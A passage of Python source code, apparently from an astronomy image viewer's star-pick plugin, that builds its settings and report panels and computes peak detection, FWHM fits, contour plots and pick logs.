'Default Region', 'button'),
('Pan to pick', 'button'),
)
w, b = Widgets.build_info(captions, orientation=orientation)
self.w.update(b)
b.zoom.set_text(self.fv.scale2text(di.get_scale()))
self.wdetail = b
b.default_region.add_callback('activated',
lambda w: self.reset_region())
b.default_region.set_tooltip("Reset region size to default")
b.pan_to_pick.add_callback('activated',
lambda w: self.pan_to_pick_cb())
b.pan_to_pick.set_tooltip("Pan image to pick center")
vbox1 = Widgets.VBox()
vbox1.add_widget(w, stretch=0)
# spacer
vbox1.add_widget(Widgets.Label(''), stretch=0)
# Pick field evaluation status
hbox = Widgets.HBox()
hbox.set_spacing(4)
hbox.set_border_width(4)
label = Widgets.Label()
#label.set_alignment(0.05, 0.5)
self.w.eval_status = label
hbox.add_widget(self.w.eval_status, stretch=0)
hbox.add_widget(Widgets.Label(''), stretch=1)
vbox1.add_widget(hbox, stretch=0)
# Pick field evaluation progress bar and stop button
hbox = Widgets.HBox()
hbox.set_spacing(4)
hbox.set_border_width(4)
btn = Widgets.Button("Stop")
btn.add_callback('activated', lambda w: self.eval_intr())
btn.set_enabled(False)
self.w.btn_intr_eval = btn
hbox.add_widget(btn, stretch=0)
self.w.eval_pgs = Widgets.ProgressBar()
hbox.add_widget(self.w.eval_pgs, stretch=1)
vbox1.add_widget(hbox, stretch=0)
nb.add_widget(vbox1, title="Readout")
# Build settings panel
captions = (('Show Candidates', 'checkbutton'),
('Radius:', 'label', 'xlbl_radius', 'label',
'Radius', 'spinbutton'),
('Threshold:', 'label', 'xlbl_threshold', 'label',
'Threshold', 'entry'),
('Min FWHM:', 'label', 'xlbl_min_fwhm', 'label',
'Min FWHM', 'spinbutton'),
('Max FWHM:', 'label', 'xlbl_max_fwhm', 'label',
'Max FWHM', 'spinbutton'),
('Ellipticity:', 'label', 'xlbl_ellipticity', 'label',
'Ellipticity', 'entry'),
('Edge:', 'label', 'xlbl_edge', 'label',
'Edge', 'entry'),
('Max side:', 'label', 'xlbl_max_side', 'label',
'Max side', 'spinbutton'),
('Coordinate Base:', 'label',
'xlbl_coordinate_base', 'label',
'Coordinate Base', 'entry'),
('Redo Pick', 'button'),
)
w, b = Widgets.build_info(captions, orientation=orientation)
self.w.update(b)
b.radius.set_tooltip("Radius for peak detection")
b.threshold.set_tooltip("Threshold for peak detection (blank=default)")
b.min_fwhm.set_tooltip("Minimum FWHM for selection")
b.max_fwhm.set_tooltip("Maximum FWHM for selection")
b.ellipticity.set_tooltip("Minimum ellipticity for selection")
b.edge.set_tooltip("Minimum edge distance for selection")
b.show_candidates.set_tooltip("Show all peak candidates")
b.coordinate_base.set_tooltip("Base of pixel coordinate system")
# radius control
#b.radius.set_digits(2)
#b.radius.set_numeric(True)
b.radius.set_limits(5.0, 200.0, incr_value=1.0)
def chg_radius(w, val):
self.radius = float(val)
self.w.xlbl_radius.set_text(str(self.radius))
return True
b.xlbl_radius.set_text(str(self.radius))
b.radius.add_callback('value-changed', chg_radius)
# threshold control
def chg_threshold(w):
threshold = None
ths = w.get_text().strip()
if len(ths) > 0:
threshold = float(ths)
self.threshold = threshold
self.w.xlbl_threshold.set_text(str(self.threshold))
return True
b.xlbl_threshold.set_text(str(self.threshold))
b.threshold.add_callback('activated', chg_threshold)
# min fwhm
#b.min_fwhm.set_digits(2)
#b.min_fwhm.set_numeric(True)
b.min_fwhm.set_limits(0.1, 200.0, incr_value=0.1)
b.min_fwhm.set_value(self.min_fwhm)
def chg_min(w, val):
self.min_fwhm = float(val)
self.w.xlbl_min_fwhm.set_text(str(self.min_fwhm))
return True
b.xlbl_min_fwhm.set_text(str(self.min_fwhm))
b.min_fwhm.add_callback('value-changed', chg_min)
# max fwhm
#b.max_fwhm.set_digits(2)
#b.max_fwhm.set_numeric(True)
b.max_fwhm.set_limits(0.1, 200.0, incr_value=0.1)
b.max_fwhm.set_value(self.max_fwhm)
def chg_max(w, val):
self.max_fwhm = float(val)
self.w.xlbl_max_fwhm.set_text(str(self.max_fwhm))
return True
b.xlbl_max_fwhm.set_text(str(self.max_fwhm))
b.max_fwhm.add_callback('value-changed', chg_max)
# Ellipticity control
def chg_ellipticity(w):
minellipse = None
val = w.get_text().strip()
if len(val) > 0:
minellipse = float(val)
self.min_ellipse = minellipse
self.w.xlbl_ellipticity.set_text(str(self.min_ellipse))
return True
b.xlbl_ellipticity.set_text(str(self.min_ellipse))
b.ellipticity.add_callback('activated', chg_ellipticity)
# Edge control
def chg_edgew(w):
edgew = None
val = w.get_text().strip()
if len(val) > 0:
edgew = float(val)
self.edgew = edgew
self.w.xlbl_edge.set_text(str(self.edgew))
return True
b.xlbl_edge.set_text(str(self.edgew))
b.edge.add_callback('activated', chg_edgew)
#b.max_side.set_digits(0)
#b.max_side.set_numeric(True)
b.max_side.set_limits(5, 10000, incr_value=10)
b.max_side.set_value(self.max_side)
def chg_max_side(w, val):
self.max_side = int(val)
self.w.xlbl_max_side.set_text(str(self.max_side))
return True
b.xlbl_max_side.set_text(str(self.max_side))
b.max_side.add_callback('value-changed', chg_max_side)
b.redo_pick.add_callback('activated', lambda w: self.redo())
b.show_candidates.set_state(self.show_candidates)
b.show_candidates.add_callback('activated', self.show_candidates_cb)
self.w.xlbl_coordinate_base.set_text(str(self.pixel_coords_offset))
b.coordinate_base.set_text(str(self.pixel_coords_offset))
b.coordinate_base.add_callback('activated', self.coordinate_base_cb)
nb.add_widget(w, title="Settings")
# Build controls panel
vbox3 = Widgets.VBox()
captions = (
('Sky cut', 'button', 'Delta sky:', 'label',
'xlbl_delta_sky', 'label', 'Delta sky', 'entry'),
('Bright cut', 'button', 'Delta bright:', 'label',
'xlbl_delta_bright', 'label', 'Delta bright', 'entry'),
)
w, b = Widgets.build_info(captions, orientation=orientation)
self.w.update(b)
b.sky_cut.set_tooltip("Set image low cut to Sky Level")
b.delta_sky.set_tooltip("Delta to apply to low cut")
b.bright_cut.set_tooltip("Set image high cut to Sky Level+Brightness")
b.delta_bright.set_tooltip("Delta to apply to high cut")
b.sky_cut.set_enabled(False)
self.w.btn_sky_cut = b.sky_cut
self.w.btn_sky_cut.add_callback('activated', lambda w: self.sky_cut())
self.w.sky_cut_delta = b.delta_sky
b.xlbl_delta_sky.set_text(str(self.delta_sky))
b.delta_sky.set_text(str(self.delta_sky))
def chg_delta_sky(w):
delta_sky = 0.0
val = w.get_text().strip()
if len(val) > 0:
delta_sky = float(val)
self.delta_sky = delta_sky
self.w.xlbl_delta_sky.set_text(str(self.delta_sky))
return True
b.delta_sky.add_callback('activated', chg_delta_sky)
b.bright_cut.set_enabled(False)
self.w.btn_bright_cut = b.bright_cut
self.w.btn_bright_cut.add_callback('activated',
lambda w: self.bright_cut())
self.w.bright_cut_delta = b.delta_bright
b.xlbl_delta_bright.set_text(str(self.delta_bright))
b.delta_bright.set_text(str(self.delta_bright))
def chg_delta_bright(w):
delta_bright = 0.0
val = w.get_text().strip()
if len(val) > 0:
delta_bright = float(val)
self.delta_bright = delta_bright
self.w.xlbl_delta_bright.set_text(str(self.delta_bright))
return True
b.delta_bright.add_callback('activated', chg_delta_bright)
vbox3.add_widget(w, stretch=0)
vbox3.add_widget(Widgets.Label(''), stretch=1)
nb.add_widget(vbox3, title="Controls")
vbox3 = Widgets.VBox()
msgFont = self.fv.getFont("fixedFont", 10)
tw = Widgets.TextArea(wrap=False, editable=True)
tw.set_font(msgFont)
self.w.report = tw
sw1 = Widgets.ScrollArea()
sw1.set_widget(tw)
vbox3.add_widget(sw1, stretch=1)
tw.append_text(self._make_report_header())
btns = Widgets.HBox()
btns.set_spacing(4)
btn = Widgets.Button("Add Pick")
btn.add_callback('activated', lambda w: self.add_pick_cb())
btns.add_widget(btn)
btn = Widgets.CheckBox("Record Picks automatically")
btn.set_state(self.do_record)
btn.add_callback('activated', self.record_cb)
btns.add_widget(btn)
btns.add_widget(Widgets.Label(''), stretch=1)
vbox3.add_widget(btns, stretch=0)
btns = Widgets.HBox()
btns.set_spacing(4)
btn = Widgets.CheckBox("Log Records")
btn.set_state(self.do_report_log)
btn.add_callback('activated', self.do_report_log_cb)
btns.add_widget(btn)
btns.add_widget(Widgets.Label("File:"))
ent = Widgets.TextEntry()
ent.set_length(512)
ent.set_text(self.report_log)
ent.add_callback('activated', self.set_report_log_cb)
btns.add_widget(ent, stretch=1)
vbox3.add_widget(btns, stretch=0)
nb.add_widget(vbox3, title="Report")
## vbox4 = Widgets.VBox()
## tw = Widgets.TextArea(wrap=False, editable=True)
## tw.set_font(msgFont)
## self.w.correct = tw
## sw1 = Widgets.ScrollArea()
## sw1.set_widget(tw)
## vbox4.add_widget(sw1, stretch=1)
## tw.append_text("# paste a reference report here")
## btns = Widgets.HBox()
## btns.set_spacing(4)
## btn = Widgets.Button("Correct WCS")
## btn.add_callback('activated', lambda w: self.correct_wcs())
## btns.add_widget(btn)
## vbox4.add_widget(btns, stretch=0)
## nb.add_widget(vbox4, title="Correct")
fr.set_widget(nb)
vbox.add_widget(fr, stretch=0)
## spacer = Widgets.Label('')
## vbox.add_widget(spacer, stretch=1)
vtop.add_widget(sw, stretch=1)
btns = Widgets.HBox()
btns.set_spacing(4)
btn = Widgets.Button("Close")
btn.add_callback('activated', lambda w: self.close())
btns.add_widget(btn)
btns.add_widget(Widgets.Label(''), stretch=1)
vtop.add_widget(btns, stretch=0)
container.add_widget(vtop, stretch=1)
def copyText(self, w):
text = w.get_text()
# TODO: put it in the clipboard
def record_cb(self, w, tf):
self.do_record = tf
return True
def do_report_log_cb(self, w, tf):
self.do_report_log = tf
if tf and (self.pick_log is None):
self.open_report_log()
return True
def set_report_log_cb(self, w):
self.close_report_log()
report_log = w.get_text().strip()
if len(report_log) == 0:
report_log = "pick_log.txt"
w.set_text(report_log)
self.report_log = report_log
self.open_report_log()
return True
## def instructions(self):
## self.tw.set_text("""Left-click to place region. Left-drag to position region. Redraw region with the right mouse button.""")
## self.tw.set_font(self.msgFont)
def update_status(self, text):
self.fv.gui_do(self.w.eval_status.set_text, text)
def init_progress(self):
self.w.btn_intr_eval.set_enabled(True)
self.w.eval_pgs.set_value(0.0)
def update_progress(self, pct):
self.w.eval_pgs.set_value(pct)
def show_candidates_cb(self, w, state):
self.show_candidates = state
if not self.show_candidates:
# Delete previous peak marks
objs = self.fitsimage.getObjectsByTagpfx('peak')
self.fitsimage.deleteObjects(objs, redraw=True)
def coordinate_base_cb(self, w):
self.pixel_coords_offset = float(w.get_text())
self.w.xlbl_coordinate_base.set_text(str(self.pixel_coords_offset))
def adjust_wcs(self, image, wcs_m, tup):
d_ra, d_dec, d_theta = tup
msg = "Calculated shift: dra, ddec = %f, %f\n" % (
d_ra/3600.0, d_dec/3600.0)
msg += "Calculated rotation: %f deg\n" % (d_theta)
msg += "\nAdjust WCS?"
dialog = GtkHelp.Dialog("Adjust WCS",
gtk.DIALOG_DESTROY_WITH_PARENT,
[['Cancel', 0], ['Ok', 1]],
lambda w, rsp: self.adjust_wcs_cb(w, rsp,
image, wcs_m))
box = dialog.get_content_area()
w = gtk.Label(msg)
box.pack_start(w, expand=True, fill=True)
dialog.show_all()
def adjust_wcs_cb(self, w, rsp, image, wcs_m):
w.destroy()
if rsp == 0:
return
#image.wcs = wcs_m.wcs
image.update_keywords(wcs_m.hdr)
return True
def plot_scroll(self, event):
# Matplotlib only gives us the number of steps of the scroll,
# positive for up and negative for down.
direction = None
if event.step > 0:
#delta = 0.9
self.plot_zoomlevel += 1.0
elif event.step < 0:
#delta = 1.1
self.plot_zoomlevel -= 1.0
self.plot_panzoom()
# x1, x2 = self.w.ax.get_xlim()
# y1, y2 = self.w.ax.get_ylim()
# self.w.ax.set_xlim(x1*delta, x2*delta)
# self.w.ax.set_ylim(y1*delta, y2*delta)
# self.w.canvas.draw()
def plot_button_press(self, event):
if event.button == 1:
self.plot_x, self.plot_y = event.x, event.y
return True
def plot_motion_notify(self, event):
if event.button == 1:
xdelta = event.x - self.plot_x
#ydelta = event.y - self.plot_y
ydelta = self.plot_y - event.y
self.pan_plot(xdelta, ydelta)
def bump_serial(self):
with self.lock:
self.serialnum += 1
return self.serialnum
def get_serial(self):
with self.lock:
return self.serialnum
def plot_panzoom(self):
ht, wd = self.contour_data.shape
x = int(self.plot_panx * wd)
y = int(self.plot_pany * ht)
if self.plot_zoomlevel >= 1.0:
scalefactor = 1.0 / self.plot_zoomlevel
elif self.plot_zoomlevel < -1.0:
scalefactor = - self.plot_zoomlevel
else:
# wierd condition?--reset to 1:1
scalefactor = 1.0
self.plot_zoomlevel = 1.0
# Show contour zoom level
text = self.fv.scale2text(1.0/scalefactor)
self.wdetail.contour_zoom.set_text(text)
xdelta = int(scalefactor * (wd/2.0))
ydelta = int(scalefactor * (ht/2.0))
xlo, xhi = x-xdelta, x+xdelta
# distribute remaining x space from plot
if xlo < 0:
xsh = abs(xlo)
xlo, xhi = 0, min(wd-1, xhi+xsh)
elif xhi >= wd:
xsh = xhi - wd
xlo, xhi = max(0, xlo-xsh), wd-1
self.w.ax.set_xlim(xlo, xhi)
ylo, yhi = y-ydelta, y+ydelta
# distribute remaining y space from plot
if ylo < 0:
ysh = abs(ylo)
ylo, yhi = 0, min(ht-1, yhi+ysh)
elif yhi >= ht:
ysh = yhi - ht
ylo, yhi = max(0, ylo-ysh), ht-1
self.w.ax.set_ylim(ylo, yhi)
self.w.fig.canvas.draw()
def plot_contours(self):
# Make a contour plot
ht, wd = self.pick_data.shape
# If size of pick region is too large, carve out a subset around
# the picked object coordinates for plotting contours
maxsize = max(ht, wd)
if maxsize > self.contour_size_limit:
image = self.fitsimage.get_image()
radius = int(self.contour_size_limit // 2)
x, y = self.pick_qs.x, self.pick_qs.y
data, x1, y1, x2, y2 = image.cutout_radius(x, y, radius)
x, y = x - x1, y - y1
ht, wd = data.shape
else:
data = self.pick_data
x, y = self.pickcenter.x, self.pickcenter.y
self.contour_data = data
# Set pan position in contour plot
self.plot_panx = float(x) / wd
self.plot_pany = float(y) / ht
self.w.ax.cla()
try:
# Create a contour plot
xarr = numpy.arange(wd)
yarr = numpy.arange(ht)
self.w.ax.contourf(xarr, yarr, data, self.num_contours)
# Mark the center of the object
self.w.ax.plot([x], [y], marker='x', ms=20.0,
color='black')
# Set the pan and zoom position & redraw
self.plot_panzoom()
except Exception as e:
self.logger.error("Error making contour plot: %s" % (
str(e)))
def clear_contours(self):
self.w.ax.cla()
def _plot_fwhm_axis(self, arr, skybg, color1, color2, color3):
N = len(arr)
X = numpy.array(list(range(N)))
Y = arr
# subtract sky background
## skybg = numpy.median(Y)
Y = Y - skybg
maxv = Y.max()
# clamp to 0..max
Y = Y.clip(0, maxv)
self.logger.debug("Y=%s" % (str(Y)))
self.w.ax2.plot(X, Y, color=color1, marker='.')
fwhm, mu, sdev, maxv = self.iqcalc.calc_fwhm(arr)
Z = numpy.array([self.iqcalc.gaussian(x, (mu, sdev, maxv)) for x in X])
self.w.ax2.plot(X, Z, color=color1, linestyle=':')
self.w.ax2.axvspan(mu-fwhm/2.0, mu+fwhm/2.0,
facecolor=color3, alpha=0.25)
return (fwhm, mu, sdev, maxv)
def plot_fwhm(self, qs):
# Make a FWHM plot
self.w.ax2.cla()
x, y, radius = qs.x, qs.y, qs.fwhm_radius
try:
image = self.fitsimage.get_image()
x0, y0, xarr, yarr = image.cutout_cross(x, y, radius)
# get median value from the cutout area
skybg = numpy.median(self.pick_data)
self.logger.debug("cutting x=%d y=%d r=%d med=%f" % (
x, y, radius, skybg))
self.logger.debug("xarr=%s" % (str(xarr)))
fwhm_x, mu, sdev, maxv = self._plot_fwhm_axis(xarr, skybg,
'blue', 'blue', 'skyblue')
self.logger.debug("yarr=%s" % (str(yarr)))
fwhm_y, mu, sdev, maxv = self._plot_fwhm_axis(yarr, skybg,
'green', 'green', 'seagreen')
plt = self.w.ax2
plt.legend(('data x', 'gauss x', 'data y', 'gauss y'),
'upper right', shadow=False, fancybox=False,
prop={'size': 8}, labelspacing=0.2)
plt.set_title("FWHM X: %.2f Y: %.2f" % (fwhm_x, fwhm_y))
self.w.fig2.canvas.draw()
except Exception as e:
self.logger.error("Error making fwhm plot: %s" % (
str(e)))
def clear_fwhm(self):
self.w.ax2.cla()
def open_report_log(self):
# Open report log if user specified one
if self.do_report_log and (self.report_log is not None) and \
(self.pick_log is None):
try:
file_exists = os.path.exists(self.report_log)
self.pick_log = open(self.report_log, 'a')
if not file_exists:
self.pick_log.write(self.rpt_header + '\n')
self.logger.info("Opened Pick log '%s'" % (self.report_log))
except IOError as e:
self.logger.error("Error opening Pick log (%s): %s" % (
self.report_log, str(e)))
def close_report_log(self):
if self.pick_log is not None:
try:
self.pick_log.close()
self.logger.info("Closed Pick log '%s'" % (self.report_log))
except IOError as e:
self.logger.error("Error closing Pick log (%s): %s" % (
self.report_log, str(e)))
finally:
self.pick_log = None
def close(self):
chname = self.fv.get_channelName(self.fitsimage)
self.fv.stop_local_plugin(chname, str(self))
return True
def start(self):
#self.instructions()
self.open_report_log()
# insert layer if it is not already
try:
obj = self.fitsimage.getObjectByTag(self.layertag)
except KeyError:
# Add canvas layer
self.fitsimage.add(self.canvas, tag=self.layertag)
self.resume()
def pause(self):
self.canvas.ui_setActive(False)
def resume(self):
# turn off any mode user may be in
self.modes_off()
self.canvas.ui_setActive(True)
self.fv.showStatus("Draw a rectangle with the right mouse button")
def stop(self):
# Delete previous peak marks
objs = self.fitsimage.getObjectsByTagpfx('peak')
self.fitsimage.deleteObjects(objs, redraw=False)
# close pick log, if any
self.close_report_log()
# deactivate the canvas
self.canvas.ui_setActive(False)
try:
self.fitsimage.deleteObjectByTag(self.layertag)
except:
pass
self.fv.showStatus("")
def redo(self):
serialnum = self.bump_serial()
self.ev_intr.set()
fig = self.canvas.getObjectByTag(self.picktag)
if fig.kind != 'compound':
return True
bbox = fig.objects[0]
point = fig.objects[1]
text = fig.objects[2]
data_x, data_y = point.x, point.y
#self.fitsimage.panset_xy(data_x, data_y, redraw=False)
# set the pick image to have the same cut levels and transforms
self.fitsimage.copy_attributes(self.pickimage,
['transforms', 'cutlevels',
'rgbmap'],
redraw=False)
try:
image = self.fitsimage.get_image()
# sanity check on region
width = bbox.x2 - bbox.x1
height = bbox.y2 - bbox.y1
if (width > self.max_side) or (height > self.max_side):
errmsg = "Image area (%dx%d) too large!" % (
width, height)
self.fv.show_error(errmsg)
raise Exception(errmsg)
# Cut and show pick image in pick window
#self.pick_x, self.pick_y = data_x, data_y
self.logger.debug("bbox %f,%f %f,%f" % (bbox.x1, bbox.y1,
bbox.x2, bbox.y2))
x1, y1, x2, y2, data = self.cutdetail(self.fitsimage,
self.pickimage,
int(bbox.x1), int(bbox.y1),
int(bbox.x2), int(bbox.y2))
self.logger.debug("cut box %f,%f %f,%f" % (x1, y1, x2, y2))
# calculate center of pick image
wd, ht = self.pickimage.get_data_size()
xc = wd // 2
yc = ht // 2
if not self.pickcenter:
tag = self.pickimage.add(self.dc.Point(xc, yc, 5,
linewidth=1,
color='red'))
self.pickcenter = self.pickimage.getObjectByTag(tag)
self.pick_x1, self.pick_y1 = x1, y1
self.pick_data = data
self.wdetail.sample_area.set_text('%dx%d' % (x2-x1, y2-y1))
point.color = 'red'
text.text = 'Pick: calc'
self.pickcenter.x = xc
self.pickcenter.y = yc
self.pickcenter.color = 'red'
# clear contour and fwhm plots
if self.have_mpl:
self.clear_contours()
self.clear_fwhm()
# Delete previous peak marks
objs = self.fitsimage.getObjectsByTagpfx('peak')
self.fitsimage.deleteObjects(objs, redraw=True)
# Offload this task to another thread so that GUI remains
# responsive
self.fv.nongui_do(self.search, serialnum, data,
x1, y1, wd, ht, fig)
except Exception as e:
self.logger.error("Error calculating quality metrics: %s" % (
str(e)))
return True
def search(self, serialnum, data, x1, y1, wd, ht, fig):
if serialnum != self.get_serial():
return
with self.lock2:
self.pgs_cnt = 0
self.ev_intr.clear()
self.fv.gui_call(self.init_progress)
msg, results, qs = None, None, None
try:
self.update_status("Finding bright peaks...")
# Find bright peaks in the cutout
peaks = self.iqcalc.find_bright_peaks(data,
threshold=self.threshold,
radius=self.radius)
num_peaks = len(peaks)
if num_peaks == 0:
raise Exception("Cannot find bright peaks")
def cb_fn(obj):
self.pgs_cnt += 1
pct = float(self.pgs_cnt) / num_peaks
self.fv.gui_do(self.update_progress, pct)
# Evaluate those peaks
self.update_status("Evaluating %d bright peaks..." % (
num_peaks))
objlist = self.iqcalc.evaluate_peaks(peaks, data,
fwhm_radius=self.radius,
cb_fn=cb_fn,
ev_intr=self.ev_intr)
num_candidates = len(objlist)
if num_candidates == 0:
raise Exception("Error evaluating bright peaks: no candidates found")
self.update_status("Selecting from %d candidates..." % (
num_candidates))
height, width = data.shape
results = self.iqcalc.objlist_select(objlist, width, height,
minfwhm=self.min_fwhm,
maxfwhm=self.max_fwhm,
minelipse=self.min_ellipse,
edgew=self.edgew)
if len(results) == 0:
raise Exception("No object matches selection criteria")
qs = results[0]
except Exception as e:
msg = str(e)
self.update_status(msg)
if serialnum == self.get_serial():
self.fv.gui_do(self.update_pick, serialnum, results, qs,
x1, y1, wd, ht, fig, msg)
def _make_report_header(self):
return self.rpt_header + '\n'
def _make_report(self, image, qs):
d = Bunch.Bunch()
try:
x, y = qs.objx, qs.objy
equinox = float(image.get_keyword('EQUINOX', 2000.0))
try:
ra_deg, dec_deg = image.pixtoradec(x, y, coords='data')
ra_txt, dec_txt = wcs.deg2fmt(ra_deg, dec_deg, 'str')
except Exception as e:
self.logger.warn("Couldn't calculate sky coordinates: %s" % (str(e)))
ra_deg, dec_deg = 0.0, 0.0
ra_txt = dec_txt = 'BAD WCS'
# Calculate star size from pixel pitch
try:
header = image.get_header()
((xrot, yrot),
(cdelt1, cdelt2)) = wcs.get_xy_rotation_and_scale(header)
starsize = self.iqcalc.starsize(qs.fwhm_x, cdelt1,
qs.fwhm_y, cdelt2)
except Exception as e:
self.logger.warn("Couldn't calculate star size: %s" % (str(e)))
starsize = 0.0
rpt_x = x + self.pixel_coords_offset
rpt_y = y + self.pixel_coords_offset
# make a report in the form of a dictionary
d.setvals(x = rpt_x, y = rpt_y,
ra_deg = ra_deg, dec_deg = dec_deg,
ra_txt = ra_txt, dec_txt = dec_txt,
equinox = equinox,
fwhm = qs.fwhm,
fwhm_x = qs.fwhm_x, fwhm_y = qs.fwhm_y,
ellipse = qs.elipse, background = qs.background,
skylevel = qs.skylevel, brightness = qs.brightness,
starsize = starsize,
time_local = time.strftime("%Y-%m-%d %H:%M:%S",
time.localtime()),
time_ut = time.strftime("%Y-%m-%d %H:%M:%S",
time.gmtime()),
)
except Exception as e:
self.logger.error("Error making report: %s" % (str(e)))
return d
def update_pick(self, serialnum, objlist, qs, x1, y1, wd, ht, fig, msg):
if serialnum != self.get_serial():
return
try:
image = self.fitsimage.get_image()
point = fig.objects[1]
text = fig.objects[2]
text.text = "Pick"
if msg is not None:
raise Exception(msg)
# Mark new peaks, if desired
if self.show_candidates:
for obj in objlist:
tag = self.fitsimage.add(self.dc.Point(x1+obj.objx,
y1+obj.objy,
5,
linewidth=1,
color=self.candidate_color),
tagpfx='peak', redraw=False)
# Add back in offsets into image to get correct values with respect
# to the entire image
qs.x += x1
qs.y += y1
qs.objx += x1
qs.objy += y1
# Calculate X/Y of center of star
obj_x = qs.objx
obj_y = qs.objy
fwhm = qs.fwhm
fwhm_x, fwhm_y = qs.fwhm_x, qs.fwhm_y
point.x, point.y = obj_x, obj_y
text.color = 'cyan'
# Make report
self.last_rpt = self._make_report(image, qs)
d = self.last_rpt
if self.do_record:
self.add_pick_cb()
self.wdetail.fwhm_x.set_text('%.3f' % fwhm_x)
self.wdetail.fwhm_y.set_text('%.3f' % fwhm_y)
self.wdetail.fwhm.set_text('%.3f' % fwhm)
self.wdetail.object_x.set_text('%.3f' % (d.x))
self.wdetail.object_y.set_text('%.3f' % (d.y))
self.wdetail.sky_level.set_text('%.3f' % qs.skylevel)
self.wdetail.background.set_text('%.3f' % qs.background)
self.wdetail.brightness.set_text('%.3f' % qs.brightness)
self.wdetail.ra.set_text(d.ra_txt)
self.wdetail.dec.set_text(d.dec_txt)
self.wdetail.equinox.set_text(str(d.equinox))
self.wdetail.star_size.set_text('%.3f' % d.starsize)
self.w.btn_sky_cut.set_enabled(True)
self.w.btn_bright_cut.set_enabled(True)
# Mark center of object on pick image
i1 = point.x - x1
j1 = point.y - y1
self.pickcenter.x = i1
self.pickcenter.y = j1
self.pickcenter.color = 'cyan'
self.pick_qs = qs
self.pickimage.panset_xy(i1, j1, redraw=True)
# Mark object center on image
point.color = 'cyan'
#self.fitsimage.panset_xy(obj_x, obj_y, redraw=False)
self.update_status("Done")
self.plot_panx = float(i1) / wd
self.plot_pany = float(j1) / ht
if self.have_mpl:
self.plot_contours()
self.plot_fwhm(qs)
except Exception as e:
errmsg = "Error calculating quality metrics: %s" % (
str(e))
self.logger.error(errmsg)
self.fv.show_error(errmsg, raisetab=False)
#self.update_status("Error")
for key in ('sky_level', 'background', 'brightness',
'star_size', 'fwhm_x', 'fwhm_y'):
self.wdetail[key].set_text('')
self.wdetail.fwhm.set_text('Failed')
self.w.btn_sky_cut.set_enabled(False)
self.w.btn_bright_cut.set_enabled(False)
self.pick_qs = None
text.color = 'red'
self.plot_panx = self.plot_pany = 0.5
#self.plot_contours()
# TODO: could calc background based on numpy calc
self.w.btn_intr_eval.set_enabled(False)
self.pickimage.redraw(whence=3)
self.canvas.redraw(whence=3)
self.fv.showStatus("Click left mouse button to reposition pick")
return True
def eval_intr(self):
self.ev_intr.set()
def btndown(self, canvas, event, data_x, data_y):
try:
obj = self.canvas.getObjectByTag(self.picktag)
if obj.kind == 'rectangle':
bbox = obj
else:
bbox = obj.objects[0]
point = obj.objects[1]
self.dx = (bbox.x2 - bbox.x1) // 2
self.dy = (bbox.y2 - bbox.y1) // 2
except Exception as e:
pass
dx = self.dx
dy = self.dy
# Mark center of object and region on main image
try:
self.canvas.deleteObjectByTag(self.picktag, redraw=False)
except:
pass
x1, y1 = data_x - dx, data_y - dy
x2, y2 = data_x + dx, data_y + dy
tag = self.canvas.add(self.dc.Rectangle(x1, y1, x2, y2,
color='cyan',
linestyle='dash'))
self.picktag = tag
#self.draw_cb(self.canvas, tag)
return True
def update(self, canvas, event, data_x, data_y):
try:
obj = self.canvas.getObjectByTag(self.picktag)
if obj.kind == 'rectangle':
bbox = obj
else:
bbox = obj.objects[0]
point = obj.objects[1]
self.dx = (bbox.x2 - bbox.x1) // 2
self.dy = (bbox.y2 - bbox.y1) // 2
except Exception as e:
obj = None
pass
dx = self.dx
dy = self.dy
x1, y1 = data_x - dx, data_y - dy
x2, y2 = data_x + dx, data_y + dy
if (not obj) or (obj.kind == 'compound'):
# Replace compound image with rectangle
try:
self.canvas.deleteObjectByTag(self.picktag, redraw=False)
except:
pass
tag = self.canvas.add(self.dc.Rectangle(x1, y1, x2, y2,
color='cyan',
linestyle='dash'),
redraw=False)
else:
# Update current rectangle with new coords
bbox.x1, bbox.y1, bbox.x2, bbox.y2 = x1, y1, x2, y2
tag = self.picktag
self.draw_cb(self.canvas, tag)
return True
def drag(self, canvas, event, data_x, data_y):
obj = self.canvas.getObjectByTag(self.picktag)
if obj.kind == 'compound':
bbox = obj.objects[0]
elif obj.kind == 'rectangle':
bbox = obj
else:
return True
# calculate center of bbox
wd = bbox.x2 - bbox.x1
dw = wd // 2
ht = bbox.y2 - bbox.y1
dh = ht // 2
x, y = bbox.x1 + dw, bbox.y1 + dh
# calculate offsets of move
dx = (data_x - x)
dy = (data_y - y)
# calculate new coords
x1, y1, x2, y2 = bbox.x1+dx, bbox.y1+dy, bbox.x2+dx, bbox.y2+dy
if (not obj) or (obj.kind == 'compound'):
# Replace compound image with rectangle
try:
self.canvas.deleteObjectByTag(self.picktag, redraw=False)
except:
pass
self.picktag = self.canvas.add(self.dc.Rectangle(x1, y1, x2, y2,
color='cyan',
linestyle='dash'))
else:
# Update current rectangle with new coords and redraw
bbox.x1, bbox.y1, bbox.x2, bbox.y2 = x1, y1, x2, y2
self.canvas.redraw(whence=3)
return True
def draw_cb(self, canvas, tag):
obj = canvas.getObjectByTag(tag)
if obj.kind != 'rectangle':
return True
canvas.deleteObjectByTag(tag, redraw=False)
if self.picktag:
try:
canvas.deleteObjectByTag(self.picktag, redraw=False)
except:
pass
# determine center of rectangle
x1, y1, x2, y2 = obj.get_llur()
x = x1 + (x2 - x1) // 2
y = y1 + (y2 - y1) // 2
tag = canvas.add(self.dc.CompoundObject(
self.dc.Rectangle(x1, y1, x2, y2,
color=self.pickcolor),
self.dc.Point(x, y, 10, color='red'),
self.dc.Text(x1, y2+4, "Pick: calc",
color=self.pickcolor)),
redraw=False)
self.picktag = tag
#self.fv.raise_tab("detail")
return self.redo()
def edit_cb(self, canvas, obj):
if obj.kind != 'rectangle':
return True
# Get the compound object that sits on the canvas.
# Make sure edited rectangle was our pick rectangle.
c_obj = self.canvas.getObjectByTag(self.picktag)
if (c_obj.kind != 'compound') or (len(c_obj.objects) < 3) or \
(c_obj.objects[0] != obj):
return False
# determine center of rectangle
x1, y1, x2, y2 = obj.get_llur()
x = x1 + (x2 - x1) // 2
y = y1 + (y2 - y1) // 2
# reposition other elements to match
point = c_obj.objects[1]
point.x, point.y = x, y
text = c_obj.objects[2]
text.x, text.y = x1, y2 + 4
return self.redo()
def reset_region(self):
self.dx = region_default_width
self.dy = region_default_height
obj = self.canvas.getObjectByTag(self.picktag)
if obj.kind != 'compound':
return True
bbox = obj.objects[0]
# calculate center of bbox
wd = bbox.x2 - bbox.x1
dw = wd // 2
ht = bbox.y2 - bbox.y1
dh = ht // 2
x, y = bbox.x1 + dw, bbox.y1 + dh
# calculate new coords
